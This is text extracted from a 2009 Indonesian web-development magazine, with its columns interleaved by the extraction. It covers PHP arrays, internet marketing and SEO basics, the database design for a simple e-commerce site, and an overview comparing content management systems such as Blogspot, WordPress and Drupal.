array yang digunakan untuk alat identitas dari Cara yang lebih mudah adalah dengan yang paling kecil ke besar atau sebaliknya.
suatu nilai. Karena fungsinya ini, maka nilai menentukan nilai key awal pada suatu array. Berikut adalah contohnya:
key harus bersifat unik. Jika kita lihat pada
hasil cetak di atas, key dari nila “merah” <?php <?php
adalah 0. Hal ini berarti 0 adalah identitas (ID) $nama_warna = array(2=>“merah”, $satu_sampai_lima = range(1, 5);
dari “merah” sehingga tiap kali kita “kuning”, “hijau”,“biru”, “ungu”, “jingga”); $sepuluh_sampai_nol = range(10, 0);
menggunakan key 0 ini maka hasilnya akan ?> $a_sampai_z = range(a, z);
selalu mengacu pada nila “merah”. Begitu $z_sampai_a = range(z, a);
pula dengan key 1,2,3 dan seterusnya. Dengan menentukan nilai key awal, maka
secara otomatis PHP akan membuatkan key ?>
Pada contoh diatas, kita tidak menentukan untuk setiap element berikutnya. Hal ini hanya
nilai key dari objek-objek yang kita buat. berlaku untuk array indexed. Demikianlah pengenalan dasar tentang array.
Dengan demikian secara otomatis, PHP akan Pada pembahasan berikutnya kita akan
membuatkan nilai key-nya untuk kita. Kita Untuk membuat array asosiatif, terlebih melakukan operasi-operasi penggunaan data
juga bisa menentukan nilai key di dalam suatu dahulu kita buatkan key-nya. Berikut adalah array. Selamat mencoba. [Kandar]
data array. Berdasarkan tipe datanya, key di contohnya:

.ilmuwebsite magazine | perdana 2009 9


.ilmuwebsite
.marketing .magazine e-learning community offline version

Intro:
10 Pengertian internet
marketing
marketing

Pengertian
Internet Marketing
Dewasa ini penggunaan website sebagai salah satu alat pemasaran produk di internet
semakin di gemari, baik itu oleh kalangan industri maupun perseorangan yang
menggeluti bisnis internet.
.internet

M
engapa Internet Marketing langsung melalui berbagai media contact us
memberikan keuntungan dan yang tersedia.
manfaat dalam hal pemasaran?,
berikut beberapa kentungan tersebut: -Pemasaran yang interaktif
- Harga promosi yang murah Anda dapat melakukan interaksi dengan
- Mendatangkan dan mendapatkan respon customer / calon customer anda secara
customer / calon customer. langsung dengan menggunakan berbagai media
- Pemasaran yang interaktif yang ada seperti YM (Yahoo Messanger), Email,
- Harga promosi yang murah SMS dan Telepon, sehingga anda dapat
Dalam hal biaya promosi, internet marketing memberikan respon secara instant.
lebih unggul karena kita hanya perlu
mengeluarkan biaya untuk tehnis nya saja yaitu:
biaya pembuatan website, hosting dan domain.
Ada juga biaya marketing nya yang nanti akan
saya jelaskan pada segment berikutnya.
- Mendatangkan dan mendapatkan respon
customer / calon customer.
Dengan menggunakan website sebagai alat
promosi, internet marketing tidak kalah juga
dengan online atau offline marketing yang lain.
Perusahaan atau individu yang menjalankan
internet marketing juga bisa mendapatkan
respon dari customer / calon customer secara

10 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
e-learning community offline version .magazine .marketing

Internet marketing tidak semudah membangun sebuah website yang Search


membangun dan mempromosikan sebuah Engine Friendly adalah dasar dan landasan
sebelum melangkah ke dalam SEO lebih jauh.
website lalu memasang iklan pada website Berikut beberapa hal yang perlu anda ketahui
lainnya begitu saja, Internet marketing sendiri untuk membangun sebuah website yang
memadukan aspek kreatif dan tehnikal, yang sukses dalam hal SEO:
terdiri dari desain development, advertising
1. Pelajari penggunaan bahasa HTML
dan sales
Bahasa HTML tidak lah sesulit yang anda
. pikirkan, ada banyak tutorialnya di internet.
Desain development, meliputi:
- Desain dan programing sebuah website. 2. Pelajari juga Style CSS
Advertising, meliputi: Gabungkan HTML dan CSS, gantilah code
HTML <table> dengan stye CSS, gunakan
- SEM (Search Engine Marketing) seminimal mungkin penggunaan tag <table>
- SEO (Search Engine Optimization) karena ini dapat juga memperberat akses bot
- Banner Ads search engine untuk mengakses website memasukkan kata kunci (keyword) kedalam
- Email Marketing anda. seaerch engine maka dia akan mendapatkan
- Article Marketing hasil yang dia cari. Metode SEM sendiri
3. Gunakan Url Search Engine Friendly
Sales, meliputi: Matt Cuts (Google Enginering) sendiri termasuk Search Engine Optimization (SEO),
- Followup mengatakan bahwa google bot kesulitan Paid Placement Dan Paid Inclusion. Hasil di
- Membangun relationship dengan customer untuk mengakses url yang lebih dari 3 SERP (Search Engine Result Page) dapat di
- Menangani komplain customer parameter “&” contoh: tentukan dari dua cara yaitu :
www.websiteku.com/index.php?page=1&hal
Ketika anda menjalankan internet =2&cat=3&div=14&id=shoes, kalau anda
marketing anda perlu menjalankan ketiga terpaksa menggunakan bentuk URL yang Secara alami dengan menggunakan tehnik
aspek di atas dengan baik, sehingga dapat demikian maka gunakanlah maksimal 2 SEO metode ini tidak memerlukan biaya iklan,
mencapai hasil yang memuaskan. parameter “&”, lebih baik lagi anda hanya saja anda perlu menerapkan tehnik
menggunakan url yang bisa di tembus search SEO dalam website anda untuk mendapatkan
engine bot secara mudah seperti URL dengan
Web Desain Development SEO struktur Directory hasil yang optimal yaitu mendapatkan posisi
Friendly Contoh: ranking yang lebih baik dari website-website
www.websiteku.com/1/2/3/14/shoes/, struktur saingan anda.
ini lebih baik.
Cara yang ke dua adalah menggunakan
4. Letakkan keyword anda pada posisi-
posisi yang tepat. Seperti pada posisi pemasangan iklan, Google sendiri
<title>keyword anda di sini</title>, dan kalau menawarkan cara ini untuk membantu
bisa satu halaman membahas satu keyword menempatkan website anda dalam posisi
yang sama. K Contoh: anda punya halaman halaman pertama dalam SERP tanpa perlu
game Final Fantasy, maka yang harus anda
anda bersusah payah melakukan tehnik SEO,
lakukan dalam halaman tersebut adalah
membahas topik game Final Fantasy saja, dan tentunya service seperti ini tidak bisa
Ada dua pilihan dalam membangun sebuah jangan di campur adukkan dengan anda dapatkan dengan gratis.
website diantaranya menggunakan engine pembahasan game Grand Theif Auto, karena
yang sudah ada tersedia seperti wordpress hal ini akan memperngaruhi algoritma search - SEO (Search Engine Optimization),
engine.
dsb, atau anda ingin membangun sendiri adalah proses untuk meningkatkan jumlah
website anda? Jika anda menggunakan Apabila anda ingin sukses membuat website lalulintas / traffic berkualitas yang ditujukan
engine yang sudah ada, anda tidak perlu yang search engine friendly, maka penuhilah kepada suatu website dari search engine
memikirkan coding nya karena sudah di 4 point di atas, dan jangan melakukan tehnik melalui sebuah algoritma search engine
sempurnakan oleh developer engine tersebut. Black Hat SEO (akan saya jelaskan pada
secara alami. Sudah menjadi kebiasaan
episode berikutnya)
Lain halnya jika anda ingin membangun ketika seseorang sedang mecari sesuatu
website anda sendiri, anda wajib dalam search engine dan dia melihat hasil
memperhatikan hal-hal berikut. Advertising pencarian maka dia akan meng-klik website
- SEM (Search Engine Marketing) adalah yang ada pada ranking teratas dan
Sebelum menuju ke Teknik SEO ada baiknya
anda mempelajari dan memahami bagaimana suatu bentuk dari internet marketing yang seterusnya. Sehingga website dengan
membuat sebuah website yang “Search yang memanfaatkan Search Engine sebagai ranking tertinggi akan mendapatkan
Engine Friendly” terlebih dahulu. Karena alat untuk pemasarannya. Seseorang yang kesempatan lebih besar untuk mendapatkan

.ilmuwebsite magazine | perdana 2009 11


.ilmuwebsite
.marketing .magazine e-learning community offline version

klik. perusahaan. Biasanya artikel ini tersedia dan beberapa keuntungan yang tentunya berguna
- Banner ads, adalah suatu iklan berbentuk di distribusikan secara bebas untuk umum. untuk kita, beberapa keuntungan tersebut
gambar yang di pasang pada suatu website, Keuntungan dari metode ini adalah bebas di adalah customer yang loyal, return customer,
tujuannya adalah untuk menarik lalulintas sebar luaskan, contoh: apabila anda menulis dan juga feedback yang kita harapkan,
suatu website. Mekanismenya yaitu dengan artikel tentang perbandingan hosting antara masalah ini akan saya jabarkan dalam edisi
cara menaruh sebuah banner yang menarik penggunaan hosting lokal dan internasional, berikutnya.
pada suatu website kemudian banner dan jangan lupa letakkan sedikit promosi anda
tersebut memiliki link ke website lain, bentuk di akhir artikel, anda menuliskan secara jelas - Menangani komplain customer
maupun isi dari banner tersebut haruslah perbandingannya sehingga apabila ada Kita sebagai penjual jangan hanya menjual
menarik, supaya visitor tertarik untuk visitor yang tertarik untuk mengcopy nya barang lalu cuek terhadap feedback dari
mengkliknya, format dari banner dapat berupa untuk di letakkan pada web/blog mereka, customer kit, ya... mungkin saja barang yang
(Gif, JPG, PNG, SWF). maka anda akan mendapatkan kita kirimkan sedang dalam kondisi
keuntungannya yaitu promosi gratis. bermasalah? Atau customer tidak puas? Ya ..
- Email Marketing, adalah suatu bentuk Beberapa website artikel distribusi bebas pasti mereka akan melakukan komplain, dan
promosi dengan menggunakan email sebagai h t t p : / / w w w. a r t i c l e d a s h b o a r d . c o m , masalah ini akan saya jabarkan dalam edisi
alat marketingnya. Pelaku bisnis umumnya http://www.goarticle.com dsb. berikutnya. Terimakasih [B_scorpio]
menggunaka email sebagai alat pemasaran
dengan tujuan meningkatkan hubungan baik Sales
dengan pelanggan yang dulu pernah menjadi - Followup
customer kita, sehingga email marketing ini Melakukan followup adalah salah satu hal
dapat membuat customer kita menjadi loyal, terpenting dari marketing baik itu di online
tujuan lainnya adalah untuk mengirim email marketing atau internet marketing, karena kita
guna mencari pelanggan baru. Akan tetapi sebagai marketer harus agresif. Ada
berhati hatilah dengan metode ini karena beberapa cara dalam melakukan followup
anda bisa di cap sebagai spammer. Alangkah diantaranya melaui email, telp, dan sms,
lebih baik jika anda minta konfirmasi terlebih masalah ini akan saya jabarkan dalam edisi
dahulu kepada customer untuk mengirimkan berikutnya.
Email Marketing.
- Membangun relationship dengan
- Article Marketing, adalah kegiatan customer
penulisan artikel pendek yang berkaitan Ada baiknya kita menjaga hubungan dengan
dengan review suatu produk atau suatu customer kita, karena kita akan mendapatkan

12 .ilmuwebsite magazine | perdana 2009


.web .ilmuwebsite
.magazine e-learning community offline version
project
Langkah Mudah
Membuat E-Commerce
13 Sederhana (bag.1)

Langkah Mudah Membuat


E-Commerce Sederhana
Saat ini untuk membeli suatu barang seorang pembeli cukup duduk di depan
internet, hanya dengan beberapa klik saja, barang pun akan diantar sampai ke
rumah.
.web project

Sekilas mengenai ECommerce fitur-fitur yang sudah ada, ataupun mengurangi


Sering kita mendapatkan beberapa site yang fitur-fitur yang tidak diinginkan. Ya penulis akan
dilengkapi fasilitas untuk memesan suatu mencoba menjelaskan kepada anda,
produk, di mana di dalamnya terdapat beberapa bagaimana cara kerja sebuah ecommerce, dan
link berisi produk-produk yang digrupkan dalam bagaimana meracik kode sendiri, untuk
kategori-kategori tertentu yang dapat kita pilih. menghasilkan ecommerce yang benar-benar
Membeli barang cukup dengan beberapa klik sesuai dengan kebutuhan anda.
saja, dan barang pun akan diantar ke rumah Sebelum kepada tahap perancangan algoritma,
dengan selamat. Namun ada juga beberapa perancangan database, dan peracikan kode,
situs yang memang mengkhususkan dirinya satu hal yang wajib di penuhi terletak di langkah
untuk mengabdi kepada jualan online :D, ex: awal. Langkah awal ini yang nantinya digunakan
lapak-online.com. Ya, tentunya ini semua sebagai batu loncatan untuk menuju ke tahap
dibangun oleh suatu sistem yang benar-benar selanjutnya. Langkah awal ini berisi seputar
matang, seringkali sistem seperti ini disebut jawaban dari pertanyaan seperti, sistem
dengan istilah ecommerce. ECommerce ecommerce bagaimana sih yang di inginkan?!
merupakan suatu cara berbelanja atau Sistem ecommerce dengan teknis yang seperti
berdagang secara online atau direct selling yang apakah sih yang di inginkan?! Dan pertanyaan-
memanfaatkan fasilitas Internet dimana terdapat pertanyaan lain yang tentunya sangat berkaitan
website yang dapat menyediakan layanan “get erat dengan perancangan dan pembuatan
and deliver“. Seperti itulah definisi secara sistem ecommerce. Mari... mari... penulis coba
lengkapnya. mengantarkan anda untuk telusuri satu persatu,
bagaimana ecommerce itu di rancang, diracik,
Persiapan awal, Bagaimana ecommerce dan diimplementasikan.
bekerja.
Ada kalanya seorang web developer Perancangan Alur Kerja E-Commerce
menginginkan suatu sistem ecommerce yang Sesuatu hal yang wajib bagi seorang web
berbeda dengan ecommerce yang sudah ada. programmer membuat satu panduan dalam
Menginginkan ecommerce yang benar-benar perancangan suatu aplikasi, entah itu pseudo
sesuai dengan kebutuhan, dengan penambahan random, algoritma, flowchart, hal ini digunakan

13 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .web
e-learning community offline version .magazine
project

sebagai acuan agar programmer tidak keluar Berdasarkan flowchart tersebut, maka Nama Produk
?
jalur nantinya. permasalahan dalam pembuatan ecommerce Deskripsi Produk
?
Mula-mula standarnya dalam suatu aplikasi semakin mengerucut, dan pembuatan Harga Produk
?
ecommerce, seorang user dipersilahkan aplikasi ecommerce pun semakin mudah
untuk memilih kategori yang ada. Setelah tentunya. Penulis coba rincikan lagi aplikasi e- Tabel data customer
memilih kategori yang ada, maka user akan commerce yang akan di bangun nantinya. Tabel ini berfungsi untuk menyimpan data
melihat-lihat item-item yang ada dalam lengkap mengenai customer, seperti nama
kategori tersebut, misalnya flashdisk kingston Pada halaman awal, di perlihatkan produk apa pemesan, alamat si pemesan dan lain-lain.
2 GB seharga 50 ribu dalam kategori saja yang dapat dibeli. Tabel data customer berisi :
accesories dipilih oleh user tersebut, yang ? No Cutomer
ditampilkan selanjutnya adalah sebuah form Ketika user memilih salah satu produk, akan ? Nama Lengkap
yang berisi seberapa banyak flashdisk yang disediakan, seberapa banyak produk yang ? Alamat
akan dibeli oleh user tersebut, jika user akan dibeli oleh user tersebut. Anggap saja, ? Kota
memasukkan nilai 1 kedalam keranjang user ingin membeli 2 buah Headphone merk ? Provinsi
belinya maka user di persilahkan untuk Kenion, maka selanjutnya user akan ? Kodepos
melanjutkan kepada tahap pembayaran atau dihadapkan kepada suatu halaman yang ? Nomor Telepon
melihat produk lain yang akan dibeli. berisi apa saja barang yang akan dibeli oleh ? Email
Ya, apa yang penulis jabarkan diatas adalah user, user dipersilaihakn untuk memilih
penggambaran dari cara kerja ecommerce barang yang lain untuk dibeli, atau lanjut Tabel data Order
yang akan kita buat nanti. Penulis coba kepada halaman untuk melakukan proses Tabel order digunakan sebagai tempat
gambarkan dalam bentuk lain, flowchart : pemesanan barang untuk dimasukkan penyimpanan informasi pemesanan barang,
kedalam daftar database order barang, di berkaitan dengan barang apa yang di pesan,
dalam halaman tersebut juga berisi data berapa total yang harus di bayarkan, menuju
start berkenaan dengan alamat si pemesan alamat mana barang dikirim. Lengkapnya
barang, nah data inilah yang nantinya tabel data order ini berisi :
digunakan untuk proses pengiriman barang. ? No Urut Order
pilih kategori produk ? Tanggal Order
Perancangan Database E-Commerce ? No Urut Customer
Dalam sebuah system e-commerce tentunya ? Total harga barang yang harus
harus terdapat database yang dapat dibayarkan
pilih item produk menangani beberapa hal seperti: menangani ? Ongkos kirim
database produk yang akan dijual, menangani ? Total harga barang + ongkos
pencatatan order yang masuk, produk apa kirim
yang di pesan, seberapa banyak produk ? Nama Customer
simpan data item yang dibeli
tersebut dipesan, kemudian hal-hal lain ? Alamat lengkap Customer
seperti menangani alamat si pengorder, ? Kota tujuan pengiriman
nantinya data ini digunakan untuk pengiriman ? Kodepos Tujuan
lihat produk apa yang dibeli barang ke alamat si pengorder produk. Dari ? Nomor Telepon Customer
sini penulis memberikan solusi yakni tabel apa ? Email Customer
saja yang digunakan untuk menyelesaikan
permasalahan tersebut, bagaimana relasi Tabel Relasi antara Order dengan
edit daftar produk yang dibeli masing-masing tabel tersebut ada. Produknya
Harus ada sebuah tabel yang digunakan
Tabel-tabel yang diperlukan antara lain : sebagai relasi antara order dengan
checkout produknya. Hal ini digunakan sebagai
Tabel data produk pengefisienan penggunaan database,
Tabel ini menyimpan berbagai informasi kemudahan pencarian, dan mengurangi
berkaitan dengan produk yang akan dijual space yang dibutuhkan dalam penggunaan
end nantinya. Data yang disimpan antara lain : database. Tabel inilah nantinya difungsikan
? No Produk sebagai sebuah jembatan antara order
? Tanggal masuk produk dengan produk. Berisi :

.ilmuwebsite magazine | perdana 2009 14


.web .ilmuwebsite
.magazine e-learning community offline version
project

?
Nomor Order
?
Banyaknya produk yang dipesan
Relasi Masing-Masing
?
Nomor Produk Tabel Simple E-Commerce
Tabel order sementara Tbl_Order_Temp

Ya, perlu dicatat, e-commerce yang akan hidden_order


session_order
dibangun memanfaatkan fasilitas session, quantity_order
session ini tentunya diset dynamic, no_product

menggunakan session_id(). Hal ini digunakan Tbl_Products


agar user dapat langsung melakukan order no_product
date_add_product
berbarengan, dan juga tidak memerlukan name_product
Tbl_Order
Tbl_Order_Count
untuk melakukan registrasi atau login. Produk desc_product order_number
price_product order_number order_date
yang dipesan direcord ke dalam database quantity_order number_customer
no_product sub_total
dalam bentuk session, yang tentunya setiap
shipping
pengunjung memiliki perbedaan sessionid- cost_delivery
Tbl_Customer total
nya. Yang termasuk ke dalam tabel order ship_first_name
number_customer
sementara adalah : first_name ship_last_name
last_name ship_add_1
? No Order sementara address_1 ship_add_2
ship_city
? Session Order address_2
ship_state
city
? Jumlah produk yang di pesan state ship_post_code
post_code ship_phone_nmr
? No Produk yang di pesan. phone_number email
email

Dengan demikian apabila kesemuanya


dijadikan ke dalam bentuk diagram. Maka Ya, artikel bagian pertama Langkah mudah database dan coding halaman muka untuk
akan saling berkaitan satu sama lain. membuat ecommerce sederhana penulis user”, tentunya akan penulis jabarkan pada
Apabila direlasikan bentuknya dalam bentuk akhiri sampai disini, akan dilanjutkan ke Ilmuwebsite Magazine edisi berikutnya.
diagram akan menjadi seperti ini. bagian kedua mengenai “pembuatan [Al-k]

15 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
.CMS .magazine e-learning community offline version

Intro :
16 Mengenal Content
Management System (CMS)

21
Tutorial :
Langkah mudah instalasi
joomla!
Mengenal Content Management
System (CMS)
.Content Management System

Membuat web itu adalah sebuah keharusan. Lalu bagaimana jika kita ingin
membuat website dengan mudah, ya menggunakan CMS jawabannya.

Secara sederhana Content Management System atau menghapus isi website secara langsung
(CMS) adalah sistem aplikasi yang digunakan dapat dilakukan tanpa mengetik script
untuk mengelola dokumen dan konten sebuah pemrograman, Perubahan isi website dapat
sistem, karena kita lagi membahas tentang web, dilakukan melalui internet dengan mudah, cepat
jadi yang diatur dan dikontrol itu adalah seluruh isi dan tanpa menginstall software apapun atau
dan tampilan dari web yang ingin kita bangun. memiliki kemampuan teknis bahasa
pemrograman. Apakah hanya web content dan
Content ? dokumen saja yang bisa diatur? Tentu saja tidak.
Sederhananya dapat dijelaskan bahwa content Dalam perkembangannya hal-hal yang bisa diatur
adalah setiap jenis atau unit informasi digital yang oleh sebuah CMS semakin banyak, contohnya
digunakan untuk mengisi setiap halaman. block atau module position, menyisipkan dan
Content dapat berupa text, gambar, animasi, menghapus fungsi (bahasa kerennya plugin /
suara, dll. Intinya adalah semua hal yang ingin component), front page manager, bahkan
diperlihatkan kepada public melalui internet. template atau themes dari tampilan website.
Content Managemet ? Struktur CMS secara garis besar terdiri dari dua
bagian, yaitu Frontend dan Backend.
Content management atau pengelolaan isi suatu Frontend adalah tampilan halaman web kita, yaitu
website yaitu menggabungkan aturan, proses, halaman yang diakses oleh pengunjung umum
dan alur kerja sehingga kita dapat membuat, sedangkan Backend adalah bagian administrasi
mengubah, dan mem-publish seluruh isi halaman yang hanya bisa diakses sang pemilik web
sesuai dengan alur sistem. maupun orang-orang yang telah ditunjuk untuk
melakukan manajemen website. Istilah umumnya
Content Management System ? halaman admin (admin page).
Sistem itu sendiri dapat diartikan sebagai suatu
alat atau gabungan dari alat yang efisien, efektif Beberapa keuntungan menggunakan
dan memudahkan pembuatan halaman web CMS:
menggunakan sistem pengelolaan isi website. 1). Dengan CMS informasi yang ditampilkan
Dapat disimpulkan bahwa CMS adalah suatu alat secara online tetap up-todate, konsisten dan
yang dapat memusatkan kemampuan teknis dan mempunyai nilai informasi terkini.
menyebarkan kemampuan non teknis kepada 2). Menambah berita atau artikel dapat dilakukan
anggota tim untuk membuat, mengubah, dari mana saja oleh member atau user yang diberi
mengelola dan mem-publish sejumlah isi website hak untuk mem-posting berita.
seperti teks, gambar, animasi, suara dll dengan 3). Webmaster dapat lebih konsen pada sisi
aturan, proses dan alur kerja yang sudah baku teknologi nya saja, sedangkan konten atau isi
sehingga website dapat terlihat sesuai keinginan. dapat diberikan wewenang nya kepada user
Content Management System (CMS) dapat tertentu.
digunakan oleh orang yang tidak cukup mengerti 4). Dengan CMS artikel dan berita dapat diatur
pemrograman teknis. Menambah, mengubah berdasarkan criteria tertentu, masing-masing

16 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
e-learning community offline version .magazine .CMS

pemilik berita bertanggung jawab dengan memiliki tugas masing-masing dan hak akses sumber daya internalnya secara kuat.
berbeda-beda pula. Dengan demikian, setiap
informasi yang mereka kirim ke website perubahan di website dapat segera ditelusuri ? Sistem Open Source berbasis dukungan
5). Pemilik website memegang kendali penuh dan diperbaiki seperlunya. komersial
terhadap isi dan tampilan website Suatu organisasi menyediakan layanan
6). CMS didesain untuk pemilik website yang Penggunaan CMS profesional atau mendukung produk
CMS pada prinsipnya dapat dipergunakan walaupun kodenya free, tetapi sistem
tidak memiliki keahlian teknis pemrograman dievaluasi seperti sistem komersial.
untuk berbagai macam keperluan dan dalam
berbagai kondisi, seperti : Walaupun lisennya gratis, sistemnya harus
Manfaat umum CMS disesuaikan dengan kebutuhan bisnis
Manajemen Data, manajemen Data 1. Mengelola website pribadi Berdasarkan penggunaannya, CMS
merupakan fungsi utama CMS. Semua data dibedakan menjadi: Portal, Blogs, E-
2. Mengelola website perusahaan Commerce, Groupware, Forums, E-learning,
dan informasi yang telah ditampilkan belum
dapat diorganisasi dan disimpan dengan baik. 3. Portal atau website komunitas Image Gallery, dan Wiki. Berikut ini beberapa
Setiap saat, data dan informasi dapat 4. Galery Photo Open Source CMS untuk masing-masing
dipergunakan kembali sesuai dengan 5. Forum kategori tersebut.
kebutuhan. CMS pun mendukung berbagai Portal
6.Aplikasi E-Commerce, E-Learning, E-
macam macam format data seperti XML, 1024, AIOCP, AssoCIateD, Bcoos, BigAce,
Government dan lain-lain. BitWeaver, BloofoxCMS, CMS Made Simple,
HTML, PDF dan lain-lain, indexing, fungsi
pencarian, dan control terhadap revisi ContentNow, DBHcms, Dragonfly CMS,
terhadap data dan informasi. Model CMS ! Drupal, e107, eazyPortal, Elxis, Enano CMS,
Mengatur Siklus Hidup Website, banyak CMS bisa kita buat sendiri. Namun untuk Etomite, Exponent, ExV2, eZ Publish,
CMS memberikan fasilitas kepada para membuatnya kita harus mempunyai Fundanemt, FuzzyLime, Geeklog, iGaming
penggunanya untuk mengelola bagian atau isi pengetahuan yang memadai tentang bahasa CMS, Jaws, Joomla, LoveCMS, Mambo,
yang akan ditampilkan, masa atau waktu pemrograman dan database. Namun tak MDPro, MODx, Netious, OneCMS, Ovidentia,
penampilan, dan lokasi penampilan di perlu khawatir, karena saat ini sudah terdapat Pheap, PHP-Fusion, PHP-Nuke, phpwcms,
website. Tak jarang sebelum ditampilkan, puluhan CMS. Ada yang licensed, yaitu anda phpWebSite, PLUME CMS, Postnuke,
bagian atau isi direview dahulu oleh editor harus membayar untuk memiliki dan RunCMS, SilverStripe, SPIP, TikiWiki CMS,
agar validasinya terjamin. menggunakanya. Namun banyak pula yang toendaCMS, Typo3, Typolight, Website
Mendukung Web Templateing dan gratis, istilahnya Open source. Baker, Xaraya, XOOPS, dan YACS.
Standarisasi, Setiap halaman website Blogs
berasal dari templateyang telah disediakan Model CMS sendiri Ada dua model Content b2evolution, Blogger, Dotclear, Eggblog,
oleh CMS. Selain dapat menjaga konsistensi Management System yaitu : FlatPress, LifeType, Loudblog, Nucleus CMS,
tampilan secara keseluruhan, para penulis 1. CMS Komersial , CMS Komersial dibuat sBlog, Serendipity, SimplePHPBlog, Simplog,
dan editor, dapat berkosentrasi penuh dalam dan dikembangkan oleh perusahaan Textpattern, WB News, Wheatblog,
menyediakan isi website. Bila isi telah perusahaan software yang menjalankan WordPress, dan Zomplog.
tersedia, maka proses publikasi mudah usahanya dengan motif mencari keuntungan. E-Commerce
berjalan karena sudah ada template. CMS komersialpun menyediakan hampir cpCommerce, Freeway, Opencart, osc2nuke,
Beberapa bagian website kadang telah semua feature dan tidak tersedia secara osCMax, osCommerce, phpShop, dan Zen
ditetapkan sedemikian rupa sehingga tidak gratis karena penggunaannya harus membeli Cart.
dapat langsung diubah. Penetapan bagian licensi dari perusahaan pembuatnya (dari Groupware
website memberikan stndarisasi kepada licensi berdasarkan jumlah penggunnya Achievo, ACollab, dotProject, eGroupWare,
seluruh bagian website. sampai sifat multiserver dan harga murah Flyspray, Group-Office, more.groupware,
Personalisasi Website, Sekali ditempatkan sampai mahal). phpGroupWare, PHProjekt, ProjectPier,
dalam CMS, isi ditampilkan sesuai dengan 2. CMS Open Source, CMS yang dibuat dan Streber, dan WebCollab.
keinginan dan kebutuhan penggunanya. dikembangkan oleh sekelompok orang atau Forum
Terlebih lagi, kelebihan CMS yang dapat perusahaan yang intinya meberikan alternatif bbPress, Beehive, DeluxeBB, FUDForum,
memisahkan isi dan design menyebabkan murah dan terjangkau kepada pengguna. IceBB, Mercury, miniBB, MyBB, MyTopix,
proses personalisasi berjalan mudah. CMS tersedia secara gratis dapat Phorum, phpBB, PunBB, QuickSilver, SMF,
Sindikasi, Sindikasi memungkinkan sebuah dipergunakan tanpa batasan, dan UNB, UseBB, Vanilla, W-Agora, dan XMB
website membagi isinya kepada website- memberikan akses kepada pengguna akan E-Learning.
website lain. Format data yang didukung pun kode pemrograman sehingga mudah ATutor, Claroline, ClaSS, Docebo suite,
cukup bervariasi mulai dari rss, rdx, xml memodifikasi CMS dimasa mendatang. Dokeos, DrupalEd, Interact, Moodle,
hingga “backend scripting”. Sama halnya OpenSource terbagi menjadi dua model yaitu SiteAtSchool, dan SyndeoCMS.
dengan personalisasi, sindikasi mudah pula ? Sistem Open Source berbasis Image Gallery
dilakukan karena isi design dibuat terpisah. komunitas 4Images, Coppermine, Gallery, Gallery 2,
Akuntanbilitas atau Akurasi, Karena CMS Sistem Open Source berbasis komunitas LinPHA, Minishowcase, nzFotolog, Phormer,
mendukung alur kerja dan hak akses yang merupakan sistem Open Source tradisional PhpWebGallery, Pixelpost, Plogger,
jelas kepada penggunanya, data dan S i n g a p o r e , T h i c k b o x G a l l e r y,
dan free secara keseluruhan. Sistem cocok
informasi dapat pula dipertanggung jawabkan TinyWebGallery, WEBalbum, Zenphoto, dan
dengan baik. Setiap penulis atau editor untuk organisasi yang akan mengembangkan Zoph.

.ilmuwebsite magazine | perdana 2009 17


.ilmuwebsite
.CMS .magazine e-learning community offline version

DokuWiki, MediaWiki, PmWiki, QwikiWiki, ?Templatenya terbatas dan sulit berkreasi ? Penggunanya kompak
UniWakka, Wikepage, dan WikkaWiki. dengan template baru. ? Mendukung SEF (search engine friendly)
Bagi sebagian orang yang terjun dalam ?Tidak dapat dijalankan di website milik kita secara default, sehingga lebih mudah
bidang web design atau dunia blogger sendiri. ditemukan di search engine.
terkadang sulit menetukan mau ?Tidak dapat dijalankan di komputer lokal Kelemahan :
menggunakan CMS yang mana, apa (localhost) atau di komputer tanpa ? Fitur managementnya sedikit sehingga
kelebihan dan kekurangannya dsb. Nah
sambungan internet. sebagian orang menganggap terlalu
dibawahl ini akan diberikan perbandingan-
perbandingan beberapa CMS terkenal di sederhana.
dunia. 2. WordPress ? Jarang digunakan oleh website-website
CMS terpopuler saat ini? Wordpress! Tidak besar di dunia.
1. Blogspot terbantah lagi kalau CMS yang satu ini ? Plugginnya tidak sebanyak Joomla, dan
Media Blog pertama kali di populerkan oleh digunakan oleh begitu banyak website terkadang masih lebih bagus pluggin Joomla.
Blogger.com (http://www.blogger.com), yang terutama web-blog, CMS ini cocok sekali
dimiliki oleh PyraLab sebelum akhirnya digunakan untuk website berbasis news atau 3. Drupal
PyraLab diakuisi oleh Google.com pada akhir berita. Kesederhanaan administrator sidenya
membuat CMS ini sangat fasih digunakan Drupal adalah content management system
tahun 2002 yang lalu. Merupakan salah satu
CMS blog terpopuler saat ini, kelebihannya untuk pemula sekalipun. Kemampuan dan blogging engine yang pertama kali
dari blog ini adalah sudah dapat membaca templatingnya sangat digemari juga karena dikembangkan oleh Dries Buytaert sebagai
javascript sehingga kita dapat memperindah sangat mudah dimengerti. Mengejutkan sebuah sistem bulletin board. Sekarang ini
tampilan blog kita dengan aneka macam ketika sekarang wordpress dengan
Drupal banyak digunakan oleh website-
widget dan tools seperti shoutbox, jam analog pluginsnya yang berkembang pesat sehingga
dapat digunakan untuk kebutuhan CMS website yang memiliki traffic tinggi dan
atau digital, alexa rangking, pagerange dan
tentunya dapat digunakan untuk menambah corporate bahkan digunakan sebagai simple memiliki tingkat penanganan sebuah website
penghasilan melalui berbagai program shoping chart. Kelebihan lain dari CMS ini hirarki yang kompleks. Kami sangat
periklanan yang telah marak seperti Google sangat mudah dioptimasi menjadi sebuah menyarankan penggunaan Drupal untuk
Adsense. website yang search engine friendly dengan

Tampilan Blogspot Tampilan WordPress Tampilan Drupal

Keunggulan : website-website berskala besar dan tingkat


tag sistemnya, friendly url, custom meta, auto
?Sangat mudah dioperasikan, hanya perlu ping, sitemap dan rss-nya. Penggunaan CMS pemahaman web administrator tingkat
mendaftar di situsnya Blogspot.com. disangat sarankan untuk website berskala advance.
?Pluggin alias aksesoris tambahan sudah kecil atau website berbasis berita dan weblog.
disediakan (built up). Keunggulan :
memenangkan dua jenis penghargaan dalam
?Cocok untuk para pemula. ? Cukup mudah dioperasikan.
Packt Publishing 2008 Open Source CMS
?Sederhana. ? Sederhana.
Awards yaitu:
?Mendukung bahasa Indonesia. ? Akun gratis wordpress dapat dimiliki dengan
1. Overall 2008 Open Source CMS Award
?Penggunanya kompak mendaftar di WordPress.com.
(Penghargaan Open Source CMS 2008 untuk
?Mendukung SEF (search engine friendly) ? WordPress juga dapat dijalankan di website
Keseluruhan)
secara default, sehingga lebih mudah milik kita sendiri (tidak seperti Blogspot yang
